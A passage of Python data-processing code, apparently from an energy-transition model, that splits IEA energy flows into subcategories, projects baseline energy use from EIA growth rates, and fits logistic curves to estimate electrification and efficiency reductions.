\"DOMESAIR\", \"baseline\", x.name[3], \"Light\"\n ].values\n ),\n axis=1,\n )\n .rename(index={\"DOMESAIR\": \"SDOMESAIR\"})\n )\n\n # Create Long-range Flow (LDOMESAIR) using estimate of the fraction of DOMESAIR\n # that is Long-range\n ldomesair = (\n energy_historical[\n (energy_historical.reset_index().flow_short == \"DOMESAIR\").values\n ]\n .parallel_apply(\n lambda x: x\n * (\n subsector_props.loc[\n x.name[2], \"DOMESAIR\", \"baseline\", x.name[3], \"Heavy\"\n ].values\n ),\n axis=1,\n )\n .rename(index={\"DOMESAIR\": \"LDOMESAIR\"})\n )\n\n # Drop DOMESAIR Flow and add SDOMESAIR and LDOMESAIR\n energy_historical = pd.concat(\n [\n energy_historical.drop(labels=[\"DOMESAIR\"], level=5),\n sdomesair,\n ldomesair,\n ]\n )\n\n # endregion\n\n # Split RAIL Flow into Light-duty, Heavy-duty\n\n # region\n\n # Create Light-duty Flow (LIGHTRAIL) using estimate of the fraction of RAIL that is\n # Light-duty\n lightrail = (\n energy_historical[\n (energy_historical.reset_index().flow_short == \"RAIL\").values\n ]\n .parallel_apply(\n lambda x: x\n * (\n subsector_props.loc[\n x.name[2], \"RAIL\", \"baseline\", x.name[3], \"Light\"\n ].values\n ),\n axis=1,\n )\n .rename(index={\"RAIL\": \"LIGHTRAIL\"})\n )\n\n # Create Heavy-duty Flow (HEAVYRAIL) using estimate of the fraction of RAIL that is\n # Heavy-duty\n heavyrail = (\n energy_historical[\n (energy_historical.reset_index().flow_short == \"RAIL\").values\n ]\n .parallel_apply(\n lambda x: x\n * (\n subsector_props.loc[\n x.name[2], \"RAIL\", \"baseline\", x.name[3], \"Heavy\"\n ].values\n ),\n axis=1,\n )\n .rename(index={\"RAIL\": \"HEAVYRAIL\"})\n )\n\n # Drop RAIL Flow and add LIGHTRAIL and HEAVYRAIL\n energy_historical = pd.concat(\n [\n energy_historical.drop(labels=[\"RAIL\"], level=5),\n lightrail,\n heavyrail,\n ]\n )\n\n # endregion\n\n # Split HEAT & HEATNS Products into LHEAT/LHEATNS (low temperature) and\n # HHEAT/HHEATNS (high temperature) heat\n\n # region\n\n # Create Low Temperature Heat Product (LHEAT) using estimate of the fraction of\n # HEAT that is low temperature\n lheat = (\n energy_historical[\n (\n (energy_historical.reset_index().product_short == \"HEAT\")\n | (energy_historical.reset_index().product_short == \"HEATNS\")\n ).values\n ]\n .parallel_apply(\n lambda x: x\n * (\n subsector_props.loc[\n \"world\",\n x.name[4],\n \"baseline\",\n x.name[5],\n \"Low Temperature\",\n ].values\n ),\n axis=1,\n )\n .rename(index={\"HEAT\": \"LHEAT\", \"HEATNS\": \"LHEATNS\"})\n )\n\n # Create High Temperature Heat Product (HHEAT) using estimate of the fraction of\n # HEAT that is high temperature\n hheat = (\n energy_historical[\n (\n (energy_historical.reset_index().product_short == \"HEAT\")\n | (energy_historical.reset_index().product_short == \"HEATNS\")\n ).values\n ]\n .parallel_apply(\n lambda x: x\n * (\n 1\n - subsector_props.loc[\n \"world\",\n x.name[4],\n \"baseline\",\n x.name[5],\n \"Low Temperature\",\n ].values\n ),\n axis=1,\n )\n .rename(index={\"HEAT\": \"HHEAT\", \"HEATNS\": \"HHEATNS\"})\n )\n\n # Drop HEAT, HEATNS Products and add LHEAT, LHEATNS, HHEAT, HHEATNS\n energy_historical = pd.concat(\n [\n energy_historical.drop(labels=[\"HEAT\", \"HEATNS\"], level=4),\n lheat,\n hheat,\n ]\n )\n\n # endregion\n\n # Split NONCRUDE Product into HYDROGEN and NONCRUDE\n\n # region\n\n # Create HYDROGEN Product (HYDROGEN) using estimate of the fraction of NONCRUDE\n # that is Hydrogen\n hydrogen = (\n energy_historical[\n (\n energy_historical.reset_index().product_short == \"NONCRUDE\"\n ).values\n ]\n .parallel_apply(\n lambda x: x\n * (\n subsector_props.loc[\n \"world\", x.name[4], \"baseline\", x.name[5], \"Hydrogen\"\n ].values\n ),\n axis=1,\n )\n .rename(index={\"NONCRUDE\": \"HYDROGEN\"})\n )\n\n # Update NONCRUDE Product to be reduced by the estimate of HYDROGEN\n noncrude = energy_historical[\n (energy_historical.reset_index().product_short == \"NONCRUDE\").values\n ].parallel_apply(\n lambda x: x\n * (\n 1\n - subsector_props.loc[\n \"world\", x.name[4], \"baseline\", x.name[5], \"Hydrogen\"\n ].values\n ),\n axis=1,\n )\n\n # Drop old NONCRUDE Product and add HYDROGEN and new NONCRUDE\n energy_historical = pd.concat(\n [\n energy_historical.drop(labels=[\"NONCRUDE\"], level=4),\n hydrogen,\n noncrude,\n ]\n )\n\n # endregion\n\n # Split SOLARPV Product into ROOFTOP and SOLARPV (utility) scale solar pv\n\n # region\n energy_historical.update(\n energy_historical[\n (energy_historical.reset_index().product_short == \"SOLARPV\").values\n ].parallel_apply(lambda x: x * 0.6, axis=1)\n )\n\n energy_historical = pd.concat(\n [\n energy_historical,\n (\n energy_historical[\n (\n energy_historical.reset_index().product_short\n == \"SOLARPV\"\n ).values\n ].parallel_apply(lambda x: x * 0.4, axis=1)\n ).rename(\n index={\n \"SOLARPV\": \"ROOFTOP\",\n \"Solar photovoltaics\": \"Rooftop solar photovoltaics\",\n }\n ),\n ]\n )\n\n # endregion\n\n # Add EIA region labels to energy_historical in order to match EIA regional\n # projected growth of each product\n\n # region\n\n regions = (\n pd.DataFrame(\n pd.read_csv(\n \"podi/data/region_categories.csv\",\n usecols=[\"WEB Region\", \"EIA Region\"],\n ).dropna(axis=0)\n )\n .set_index([\"WEB Region\"])\n .rename_axis(index={\"WEB Region\": \"region\"})\n )\n regions.index = regions.index.str.lower()\n\n energy_historical = (\n (\n energy_historical.reset_index()\n .set_index([\"region\"])\n .merge(regions, on=[\"region\"])\n )\n .reset_index()\n .set_index([\"EIA Region\"])\n )\n\n # endregion\n\n # Add categories and long names for products and flows\n\n # region\n\n longnames = pd.read_csv(\n \"podi/data/IEA/Other/IEA_Product_Definitions.csv\",\n usecols=[\"product_category\", \"product_long\", \"product_short\"],\n )\n\n energy_historical[\"product_category\"] = energy_historical.parallel_apply(\n lambda x: longnames[longnames[\"product_short\"] == x[\"product_short\"]][\n \"product_category\"\n ].squeeze(\"rows\"),\n axis=1,\n )\n\n energy_historical[\"product_long\"] = energy_historical.parallel_apply(\n lambda x: longnames[longnames[\"product_short\"] == x[\"product_short\"]][\n \"product_long\"\n ].squeeze(\"rows\"),\n axis=1,\n )\n\n longnames = pd.read_csv(\n \"podi/data/IEA/Other/IEA_Flow_Definitions.csv\",\n usecols=[\"flow_category\", \"flow_long\", \"flow_short\"],\n )\n\n energy_historical[\"flow_category\"] = energy_historical.parallel_apply(\n lambda x: longnames[longnames[\"flow_short\"] == x[\"flow_short\"]][\n \"flow_category\"\n ].squeeze(\"rows\"),\n axis=1,\n )\n\n energy_historical[\"flow_long\"] = energy_historical.parallel_apply(\n lambda x: longnames[longnames[\"flow_short\"] == x[\"flow_short\"]][\n \"flow_long\"\n ].squeeze(\"rows\"),\n axis=1,\n )\n\n # if flow_short is 'AGRICULT' and sector is 'Agriculture' then rename flow_long to 'Agriculture'\n energy_historical = energy_historical.reset_index()\n energy_historical.update(\n energy_historical[\n (\n (energy_historical.flow_short == \"AGRICULT\")\n & (energy_historical.sector == \"Agriculture\")\n )\n ].parallel_apply(\n lambda x: x.replace(\n {\n \"Agriculture/forestry\": \"Agriculture\",\n }\n ),\n axis=1,\n )\n )\n\n # if flow_short is 'AGRICULT' and sector is 'Forests & Wetlands' then rename flow_long to 'Forests & Wetlands' and rename flow_short to 'FOREST'\n energy_historical.update(\n energy_historical[\n (\n (energy_historical.flow_short == \"AGRICULT\")\n & (energy_historical.sector == \"Forests & Wetlands\")\n ).values\n ].parallel_apply(\n lambda x: x.replace(\n {\n \"AGRICULT\": \"FOREST\",\n \"Agriculture/forestry\": \"Forests & Wetlands\",\n }\n ),\n axis=1,\n )\n )\n\n energy_historical = energy_historical.reset_index().set_index(\n [\n \"model\",\n \"scenario\",\n \"region\",\n \"sector\",\n \"product_category\",\n \"product_long\",\n \"product_short\",\n \"flow_category\",\n \"flow_long\",\n \"flow_short\",\n \"unit\",\n \"hydrogen\",\n \"flexible\",\n \"nonenergy\",\n \"EIA Region\",\n \"EIA Product\",\n ]\n )\n\n # endregion\n\n # Convert Electricity output flow category from GWh to TJ\n energy_historical = energy_historical.astype(float)\n energy_historical.update(\n energy_historical[\n energy_historical.index.get_level_values(7) == \"Electricity output\"\n ].multiply(3.6)\n )\n\n # Convert AVBUNK & MARBUNK to be positive (they were negative by convention\n # representing an 'export' to an international region WORLDAV and WORLDMAR) and\n # change their flow_category to Final consumption,\n energy_historical[\n energy_historical.index.get_level_values(9).isin([\"AVBUNK\", \"MARBUNK\"])\n ] = energy_historical[\n energy_historical.index.get_level_values(9).isin([\"AVBUNK\", \"MARBUNK\"])\n ].abs()\n\n energy_historical_index = energy_historical.index.names\n energy_historical.reset_index(inplace=True)\n energy_historical = energy_historical.replace(\n \"Supply\", \"Final consumption\"\n )\n energy_historical.set_index(energy_historical_index, inplace=True)\n\n # Some flows in flow_category 'Transformation processes' are negative, representing\n # the ‘loss’ of a product as it transforms into another product. This is switched\n # to be consistent with positive values representing the consumption of a product.\n # Values that were already positive (representing production of a product) are\n # dropped to avoid double counting with flow_category 'Final consumption'.\n energy_historical[\n (\n energy_historical.index.get_level_values(7).isin(\n [\"Transformation processes\"]\n )\n )\n & (energy_historical.sum(axis=1) > 0)\n ] = 0\n\n energy_historical[\n energy_historical.index.get_level_values(7).isin(\n [\"Transformation processes\"]\n )\n ] = energy_historical[\n energy_historical.index.get_level_values(7).isin(\n [\"Transformation processes\"]\n )\n ].abs()\n\n # All flows in flow_category 'Energy industry own use and Losses' are negative,\n # representing the 'loss' of a product as the energy industry uses it to transform\n # one product into another. This is switched to be consistent with positive values\n # representing the consumption of a product.\n energy_historical[\n energy_historical.index.get_level_values(7).isin(\n [\"Energy industry own use and Losses\"]\n )\n ] = energy_historical[\n energy_historical.index.get_level_values(7).isin(\n [\"Energy industry own use and Losses\"]\n )\n ].abs()\n\n # Change non-energy use flows from flow_category value 'Final consumption' to\n # 'Non-energy use'.\n energy_historical_nonenergy = energy_historical[\n (\n energy_historical.reset_index().flow_short.isin(\n [\n \"NECHEM\",\n \"NECONSTRUC\",\n \"NEFOODPRO\",\n \"NEIND\",\n \"NEINONSPEC\",\n \"NEINTREN\",\n \"NEIRONSTL\",\n \"NEMACHINE\",\n \"NEMINING\",\n \"NENONFERR\",\n \"NENONMET\",\n \"NEOTHER\",\n \"NEPAPERPRO\",\n \"NETEXTILES\",\n \"NETRANS\",\n \"NETRANSEQ\",\n \"NEWOODPRO\",\n \"NONENUSE\",\n ]\n )\n ).values\n ]\n energy_historical = energy_historical.drop(\n energy_historical_nonenergy.index\n )\n\n energy_historical_nonenergy.reset_index(inplace=True)\n energy_historical_nonenergy.flow_category = \"Non-energy use\"\n energy_historical_nonenergy.set_index(\n energy_historical.index.names, inplace=True\n )\n energy_historical = (\n pd.concat([energy_historical, energy_historical_nonenergy])\n .loc[:, data_start_year:data_end_year]\n .sort_index()\n ).apply(pd.to_numeric, downcast=\"float\")\n\n for i in range(0, len(energy_historical.index.names)):\n energy_historical.index = energy_historical.index.set_levels(\n energy_historical.index.levels[i].astype(\"category\"), level=i\n )\n\n energy_historical.droplevel([\"EIA Region\", \"EIA Product\"]).to_csv(\n \"podi/data/energy_historical.csv\"\n )\n\n # endregion\n\n #############################\n # PROJECT BASELINE ENERGY #\n #############################\n\n # region\n\n # Load EIA energy projections\n energy_projection = (\n pd.read_excel(\n pd.ExcelFile(\"podi/data/EIA/EIA_IEO.xlsx\", engine=\"openpyxl\"),\n header=0,\n )\n .dropna(axis=\"index\", how=\"all\")\n .dropna(axis=\"columns\", thresh=2)\n ).loc[:, :proj_end_year]\n\n # Strip preceding space in EIA Sector values\n energy_projection[\"EIA Product\"] = energy_projection[\n \"EIA Product\"\n ].str.strip()\n\n # create dataframe of energy projections as annual % change\n energy_projection = (\n (\n pd.DataFrame(energy_projection).set_index(\n [\"EIA Region\", \"sector\", \"EIA Product\"]\n )\n )\n .pct_change(axis=1)\n .replace(NaN, 0)\n + 1\n ).loc[:, data_end_year + 1 :]\n\n # Make a copy of Industry values for Agriculture and Forests & Wetlands\n energy_projection = pd.concat(\n [\n energy_projection,\n energy_projection[\n (\n energy_projection.reset_index().sector.isin([\"Industrial\"])\n ).values\n ].rename(index={\"Industrial\": \"Agriculture\"}),\n energy_projection[\n (\n energy_projection.reset_index().sector.isin([\"Industrial\"])\n ).values\n ].rename(index={\"Industrial\": \"Forests & Wetlands\"}),\n ]\n )\n\n # Merge historical and projected energy\n energy_baseline = (\n (\n energy_historical.reset_index()\n .set_index([\"EIA Region\", \"sector\", \"EIA Product\"])\n .merge(\n energy_projection, on=[\"EIA Region\", \"sector\", \"EIA Product\"]\n )\n )\n .reset_index()\n .set_index(\n [\n \"model\",\n \"scenario\",\n \"region\",\n \"sector\",\n \"product_category\",\n \"product_long\",\n \"product_short\",\n \"flow_category\",\n \"flow_long\",\n \"flow_short\",\n \"unit\",\n \"hydrogen\",\n \"flexible\",\n \"nonenergy\",\n \"EIA Region\",\n \"EIA Product\",\n ]\n )\n .droplevel([\"EIA Region\", \"EIA Product\"])\n ).sort_index()\n\n energy_baseline = energy_baseline.parallel_apply(\n lambda x: pd.concat(\n [x.loc[: data_end_year - 1], x.loc[data_end_year:].cumprod()]\n ),\n axis=1,\n )\n\n # Save\n if os.path.exists(\"podi/data/energy_baseline.parquet\"):\n os.remove(\"podi/data/energy_baseline.parquet\")\n energy_baseline.columns = energy_baseline.columns.astype(str)\n energy_baseline.to_parquet(\n \"podi/data/energy_baseline.parquet\", compression=\"brotli\"\n )\n energy_baseline.columns = energy_baseline.columns.astype(int)\n\n # endregion\n\n ##############################################\n # ESTIMATE ENERGY REDUCTIONS & FUEL SHIFTS #\n ##############################################\n\n # region\n\n # Calculate 'electrification factors' that scale down energy over time due to the\n # lower energy required to produce an equivalent amount of work via electricity\n\n # region\n\n # Load saturation points for energy reduction ratios\n ef_ratio = (\n pd.DataFrame(\n pd.read_csv(\n \"podi/data/tech_parameters.csv\",\n usecols=[\n \"region\",\n \"product_short\",\n \"scenario\",\n \"sector\",\n \"metric\",\n \"value\",\n ],\n ),\n )\n .set_index([\"region\", \"product_short\", \"scenario\", \"sector\", \"metric\"])\n .loc[\n energy_baseline.index.get_level_values(2).unique(),\n [\n \"biofuels_waste ef ratio\",\n \"biofuels_waste addtl eff\",\n \"coal ef ratio\",\n \"coal addtl eff\",\n \"electricity ef ratio\",\n \"electricity addtl eff\",\n \"heat ef ratio\",\n \"heat addtl eff\",\n \"hydrogen ef ratio\",\n \"na\",\n \"natural gas ef ratio\",\n \"natural gas addtl eff\",\n \"nuclear ef ratio\",\n \"oil ef ratio\",\n \"oil addtl eff\",\n \"wws heat ef ratio\",\n \"wws heat addtl eff\",\n ],\n scenario,\n slice(None),\n [\n \"floor\",\n \"parameter a max\",\n \"parameter a min\",\n \"parameter b max\",\n \"parameter b min\",\n \"saturation point\",\n ],\n ]\n ).sort_index()\n\n parameters = ef_ratio\n\n ef_ratio = ef_ratio[\n ef_ratio.index.get_level_values(4) == \"floor\"\n ].sort_index()\n\n # Clear energy_adoption_curves.csv, and run adoption_projection_demand() to\n # calculate logistics curves for energy reduction ratios\n\n # Clear energy_adoption_curves.csv and energy_ef_ratio.csv\n if os.path.exists(\"podi/data/energy_adoption_curves.csv\"):\n os.remove(\"podi/data/energy_adoption_curves.csv\")\n if os.path.exists(\"podi/data/energy_ef_ratios.csv\"):\n os.remove(\"podi/data/energy_ef_ratios.csv\")\n\n def adoption_projection_demand(\n parameters,\n input_data,\n scenario,\n data_end_year,\n saturation_year,\n proj_end_year,\n ):\n def linear(x, a, b, c, d):\n return a * x + d\n\n def logistic(x, a, b, c, d):\n return c / (1 + np.exp(-a * (x - b))) + d\n\n # Create x array (year) and y array (linear scale from zero to saturation value)\n x_data = np.arange(0, proj_end_year - data_end_year + 1, 1)\n y_data = np.zeros((1, len(x_data)))\n y_data[:] = np.NaN\n y_data = y_data.squeeze().astype(float)\n y_data[0] = 0\n y_data[saturation_year - data_end_year] = parameters.loc[\n \"saturation point\"\n ].value.astype(float)\n\n y_data = np.array((pd.DataFrame(y_data).interpolate()).squeeze())\n\n # Load search bounds for logistic function parameters\n search_bounds = [\n (\n pd.to_numeric(parameters.loc[\"parameter a min\"].value),\n pd.to_numeric(parameters.loc[\"parameter a max\"].value),\n ),\n (\n pd.to_numeric(parameters.loc[\"parameter b min\"].value),\n pd.to_numeric(parameters.loc[\"parameter b max\"].value),\n ),\n (\n pd.to_numeric(parameters.loc[\"saturation point\"].value),\n pd.to_numeric(parameters.loc[\"saturation point\"].value),\n ),\n (\n 0,\n 0,\n ),\n ]\n\n # Define sum of squared error function\n def sum_of_squared_error(parameters):\n return np.sum((y_data - logistic(x_data, *parameters)) ** 2.0)\n\n # Generate genetic_parameters. For baseline scenarios, projections are linear\n if scenario == \"baseline\":\n y = linear(\n x_data,\n min(\n 0.0018,\n max(0.00001, ((y_data[-1] - y_data[0]) / len(y_data))),\n ),\n (y_data[-1]),\n )\n genetic_parameters = [0, 0, 0, 0]\n else:\n genetic_parameters = differential_evolution(\n sum_of_squared_error,\n search_bounds,\n seed=3,\n polish=False,\n updating=\"immediate\",\n mutation=(0, 1),\n ).x\n\n y = np.array(logistic(x_data, *genetic_parameters))\n\n pd.concat(\n [\n pd.DataFrame(\n np.array(\n [\n input_data.name[0],\n input_data.name[1],\n input_data.name[2],\n input_data.name[3],\n ]\n )\n ).T,\n pd.DataFrame(y).T,\n ],\n axis=1,\n ).to_csv(\n \"podi/data/energy_adoption_curves.csv\",\n mode=\"a\",\n header=None,\n index=False,\n )\n\n return\n\n ef_ratio.parallel_apply(\n lambda x: adoption_projection_demand(\n parameters=parameters.loc[\n x.name[0], x.name[1], x.name[2], x.name[3]\n ],\n input_data=x,\n scenario=scenario,\n data_end_year=data_end_year + 1,\n saturation_year=2050,\n proj_end_year=proj_end_year,\n ),\n axis=1,\n )\n\n ef_ratios = (\n pd.DataFrame(\n pd.read_csv(\"podi/data/energy_adoption_curves.csv\", header=None)\n )\n .set_axis(\n pd.concat(\n [\n pd.DataFrame(\n np.array(\n [\"region\", \"product_short\", \"scenario\", \"sector\"]\n )\n ).T,\n pd.DataFrame(\n np.linspace(\n data_end_year + 1,\n proj_end_year,\n proj_end_year - data_end_year,\n ).astype(int)\n ).T,\n ],\n axis=1,\n ).squeeze(),\n axis=1,\n )\n .set_index([\"region\", \"sector\", \"product_short\", \"scenario\"])\n ).sort_index()\n\n # Prepare df for multiplication with energy\n ef_ratios = ef_ratios.parallel_apply(\n lambda x: 1 - (1 - x.max()) * (x - x.min()) / x.max(), axis=1\n )\n\n ef_ratios = (\n pd.DataFrame(\n 1,\n index=ef_ratios.index,\n columns=np.arange(data_start_year, data_end_year + 1, 1),\n )\n ).join(ef_ratios)\n ef_ratios = ef_ratios.loc[:, : energy_baseline.columns[-1]]\n ef_ratios = ef_ratios.sort_index()\n\n ef_ratios.to_csv(\"podi/data/energy_ef_ratios.csv\")\n\n # Add labels to ef_ratios\n labels = (\n (\n pd.DataFrame(\n pd.read_csv(\n \"podi/data/product_flow_labels.csv\",\n usecols=[\n \"product_short\",\n \"flow_short\",\n \"sector\",\n \"WWS EF Product\",\n \"WWS Upstream Product\",\n \"WWS Addtl Efficiency\",\n ],\n )\n ).set_index([\"sector\", \"WWS EF Product\"])\n )\n .rename_axis(index={\"WWS EF Product\": \"product_short\"})\n .rename(columns={\"product_short\": \"IEA Product\"})\n ).sort_index()\n\n # for rows where sector is 'Forests & Wetlands', set flow_short to 'FOREST'\n labels.loc[\n labels.index.get_level_values(\"sector\") == \"Forests & Wetlands\",\n \"flow_short\",\n ] = \"FOREST\"\n\n ef_ratios = (\n (\n ef_ratios.reset_index()\n .set_index([\"sector\", \"product_short\"])\n .merge(labels, on=[\"sector\", \"product_short\"])\n .set_index(\n [\n \"region\",\n \"scenario\",\n \"IEA Product\",\n \"flow_short\",\n \"WWS Upstream Product\",\n \"WWS Addtl Efficiency\",\n ],\n append=True,\n )\n )\n .droplevel([\"product_short\", \"scenario\"])\n .reorder_levels(\n [\n \"region\",\n \"sector\",\n \"IEA Product\",\n \"flow_short\",\n \"WWS Upstream Product\",\n \"WWS Addtl Efficiency\",\n ]\n )\n )\n\n # Remove duplicate indices\n ef_ratios = ef_ratios[~ef_ratios.index.duplicated()]\n\n # endregion\n\n # Calculate 'upstream ratios' that scale down energy over time due to the lower\n # energy required for fossil fuel/biofuel/bioenergy/uranium mining/transport\n # /processing. Note that not all upstream fossil energy is eliminiated, since some\n # upstream energy is expected to remain to produce fossil fuel flows for non-energy\n # use.\n\n # region\n\n upstream_ratios = ef_ratios.copy()\n\n upstream_ratios.update(\n upstream_ratios[upstream_ratios.index.get_level_values(4) == \"Y\"]\n .parallel_apply(\n lambda x: 1 - (x.max() - x) / (x.max() - x.min()), axis=1\n )\n .fillna(0)\n )\n\n # Set upstream ratios in ef_ratios to 1 so upstream reduction is not double counted\n ef_ratios[ef_ratios.index.get_level_values(4) == \"Y\"] = 1\n ef_ratios = ef_ratios.sort_index()\n\n upstream_ratios[upstream_ratios.index.get_level_values(4) == \"N\"] = 1\n upstream_ratios = upstream_ratios.sort_index()\n\n # endregion\n\n # Reduce energy by the upstream energy reductions from fossil fuel/biofuel/bioenergy\n # /uranium mining/transport/processing\n\n # region\n\n energy_post_upstream = energy_baseline.parallel_apply(\n lambda x: x.mul(\n upstream_ratios.loc[\n x.name[2], x.name[3], x.name[6], x.name[9]\n ].squeeze()\n ),\n axis=1,\n )\n energy_post_upstream.rename(index={\"baseline\": scenario}, inplace=True)\n\n # endregion\n\n # Apply percentage reduction attributed to additional energy efficiency measures\n\n # region\n\n addtl_eff = pd.DataFrame(\n pd.read_csv(\"podi/data/energy_ef_ratios.csv\")\n ).set_index([\"scenario\", \"region\", \"sector\", \"product_short\"])\n addtl_eff.columns = addtl_eff.columns.astype(int)\n\n labels = (\n labels.reset_index()\n .drop(columns=[\"WWS Upstream Product\", \"product_short\"])\n .set_index([\"sector\", \"WWS Addtl Efficiency\"])\n .rename_axis(index={\"WWS Addtl Efficiency\": \"product_short\"})\n .rename(columns={\"product_short\": \"IEA Product\"})\n )\n\n addtl_eff = (\n (\n addtl_eff.reset_index()\n .set_index([\"sector\", \"product_short\"])\n .merge(labels, on=[\"sector\", \"product_short\"])\n .set_index(\n [\n \"region\",\n \"scenario\",\n \"IEA Product\",\n \"flow_short\",\n ],\n append=True,\n )\n )\n .droplevel([\"product_short\", \"scenario\"])\n .reorder_levels([\"region\", \"sector\", \"IEA Product\", \"flow_short\"])\n )\n\n addtl_eff = addtl_eff.groupby(\n [\"region\", \"sector\", \"IEA Product\", \"flow_short\"], observed=True\n ).mean()\n\n # Remove duplicate indices\n addtl_eff = addtl_eff[~addtl_eff.index.duplicated()]\n addtl_eff = addtl_eff.sort_index()\n\n energy_post_addtl_eff = energy_post_upstream.parallel_apply(\n lambda x: x.mul(\n addtl_eff.loc[x.name[2], x.name[3], x.name[6], x.name[9]].squeeze()\n ),\n axis=1,\n )\n\n # endregion\n\n # Estimate energy reduction and fuel shifts due to electrification\n\n # region\n\n # Isolate the energy that gets replaced with (a reduced amount of) energy from\n # electricity. Each row of energy is multiplied by\n # ((ef[0] - ef[i]) / (ef[0] - ef[-1]), which represents the percent of energy that\n # undergoes electrification in each year. This does not count preexisting\n # electricity, except for nuclear, which is estimated to shift to renewables, and\n # is treated in subsequent steps.\n energy_electrified = energy_post_addtl_eff.parallel_apply(\n lambda x: x.mul(\n (\n (\n ef_ratios.loc[x.name[2], x.name[3], x.name[6], x.name[9]]\n .squeeze()\n .iloc[0]\n - ef_ratios.loc[\n x.name[2], x.name[3], x.name[6], x.name[9]\n ].squeeze()\n )\n / (\n ef_ratios.loc[x.name[2], x.name[3], x.name[6], x.name[9]]\n .squeeze()\n .iloc[0]\n - ef_ratios.loc[x.name[2], x.name[3], x.name[6], x.name[9]]\n .squeeze()\n .iloc[-1]\n )\n ).fillna(0)\n ),\n axis=1,\n )\n\n # Find the reduced amount of electrical energy that represents an equivalent amount\n # of work to that of the energy that undergoes electrification.\n energy_reduced_electrified = energy_electrified.parallel_apply(\n lambda x: x.mul(\n ef_ratios.loc[x.name[2], x.name[3], x.name[6], x.name[9]]\n .squeeze()\n .iloc[-1]\n ),\n axis=1,\n )\n\n # Find the electrical energy from fossil fuels assumed to shift to renewables\n renewables = [\n \"GEOTHERM\",\n \"HYDRO\",\n \"SOLARPV\",\n \"ROOFTOP\",\n \"SOLARTH\",\n \"OFFSHORE\",\n \"ONSHORE\",\n \"TIDE\",\n ]\n\n energy_reduced_electrified = pd.concat(\n [\n energy_reduced_electrified,\n pd.concat(\n [\n energy_post_addtl_eff[\n ~energy_post_addtl_eff.index.get_level_values(6).isin(\n renewables\n )\n ]\n .loc[\n slice(None),\n slice(None),\n slice(None),\n slice(None),\n slice(None),\n slice(None),\n slice(None),\n [\"Electricity output\"],\n :,\n ]\n .loc[:, :data_end_year]\n * 0,\n energy_post_addtl_eff[\n ~energy_post_addtl_eff.index.get_level_values(6).isin(\n renewables\n )\n ]\n .loc[\n slice(None),\n slice(None),\n slice(None),\n slice(None),\n slice(None),\n slice(None),\n slice(None),\n [\"Electricity output\"],\n :,\n ]\n .loc[:, data_end_year + 1 :]\n .diff(axis=1)\n .fillna(0)\n .cumsum(axis=1),\n ],\n axis=1,\n ),\n ]\n )\n\n # Relabel reduced amount of energy as RELECTR or HYDROGEN\n energy_reduced_electrified2 = (\n energy_reduced_electrified.groupby(\n [\n \"model\",\n \"scenario\",\n \"region\",\n \"sector\",\n \"flow_category\",\n \"flow_long\",\n \"flow_short\",\n \"unit\",\n \"hydrogen\",\n \"flexible\",\n \"nonenergy\",\n ],\n observed=True,\n )\n .sum(numeric_only=True)\n .reset_index()\n )\n\n energy_reduced_electrified_e = energy_reduced_electrified2[\n energy_reduced_electrified2[\"hydrogen\"] == \"N\"\n ]\n energy_reduced_electrified_e[\"product_category\"] = \"Electricity and Heat\"\n energy_reduced_electrified_e[\"product_long\"] = \"Renewable Electricity\"\n energy_reduced_electrified_e[\"product_short\"] = \"RELECTR\"\n\n energy_reduced_electrified_h = energy_reduced_electrified2[\n energy_reduced_electrified2[\"hydrogen\"] == \"Y\"\n ]\n energy_reduced_electrified_h[\"product_category\"] = \"Hydrogen\"\n energy_reduced_electrified_h[\"product_long\"] = \"Hydrogen\"\n energy_reduced_electrified_h[\"product_short\"] = \"HYDROGEN\"\n\n energy_reduced_electrified3 = pd.concat(\n [energy_reduced_electrified_e, energy_reduced_electrified_h]\n )\n\n energy_reduced_electrified3.set_index(\n [\n \"model\",\n \"scenario\",\n \"region\",\n \"sector\",\n \"product_category\",\n \"product_long\",\n \"product_short\",\n \"flow_category\",\n \"flow_long\",\n \"flow_short\",\n \"unit\",\n \"hydrogen\",\n \"flexible\",\n \"nonenergy\",\n ],\n inplace=True,\n )\n\n # Add this reduced level of electrical energy to overall energy, which is\n # energy_post_addtl with the fossil fuel energy removed (energy_electrified)\n energy_post_electrification = (\n pd.concat(\n [\n energy_post_addtl_eff.subtract(energy_electrified),\n energy_reduced_electrified3,\n ]\n )\n .groupby(\n [\n \"model\",\n \"scenario\",\n \"region\",\n \"sector\",\n \"product_category\",\n \"product_long\",\n \"product_short\",\n \"flow_category\",\n \"flow_long\",\n \"flow_short\",\n \"unit\",\n \"hydrogen\",\n \"flexible\",\n \"nonenergy\",\n ],\n observed=True,\n )\n .sum(numeric_only=True)\n )\n # endregion\n\n # endregion\n\n #####################################\n # ESTIMATE UPDATED ELECTRICITY MIX #\n #####################################\n\n # region\n # For each region, find the percent of total electricity consumption met by each\n # renewable product.\n elec_supply = energy_post_electrification[\n (\n (\n energy_post_electrification.reset_index().flow_category\n == \"Electricity output\"\n ).values\n )\n & ((energy_post_electrification.reset_index().nonenergy == \"N\").values)\n ]\n\n per_elec_supply = elec_supply.parallel_apply(\n lambda x: x.divide(\n elec_supply.groupby([\"region\"], observed=True)\n .sum(0)\n .loc[x.name[2]]\n ),\n axis=1,\n ).fillna(0)\n\n # Use the historical percent of total electricity consumption met by each renewable\n # product to estimate projected percent of total electricity consumption each meets\n parameters = pd.read_csv(\n \"podi/data/tech_parameters.csv\",\n usecols=[\n \"region\",\n \"product_short\",\n \"scenario\",\n \"sector\",\n \"metric\",\n \"value\",\n ],\n ).set_index([\"region\", \"product_short\", \"scenario\", \"sector\", \"metric\"])\n parameters = parameters.sort_index()\n\n def adoption_projection(\n input_data,\n saturation_date,\n output_end_date,\n change_model,\n change_parameters,\n ):\n def linear(x, a, b, c, d):\n return a * x + d\n\n def logistic(x, a, b, c, d):\n return c / (1 + np.exp(-a * (x - b))) + d\n\n # Take 10 years prior data to fit logistic function\n x_data = np.arange(\n 0, output_end_date - input_data.last_valid_index() + 11, 1\n )\n y_data = np.zeros((1, len(x_data)))\n y_data[:, :] = np.NaN\n y_data = y_data.squeeze().astype(float)\n y_data[:11] = input_data.loc[\n input_data.last_valid_index() - 10 : input_data.last_valid_index()\n ]\n y_data[\n saturation_date - input_data.last_valid_index()\n ] = change_parameters.loc[\"saturation point\"].value.astype(float)\n\n # Handle cases where saturation point is below current value, by making\n # saturation point equidistant from current value but in positive direction\n if y_data[10] > y_data[-1]:\n y_data[-1] = y_data[10] + abs(y_data[-1] - y_data[10])\n\n y_data = np.array(\n (pd.DataFrame(y_data).interpolate(method=\"linear\")).squeeze()\n )\n\n # Load search bounds for logistic function parameters\n search_bounds = [\n (\n 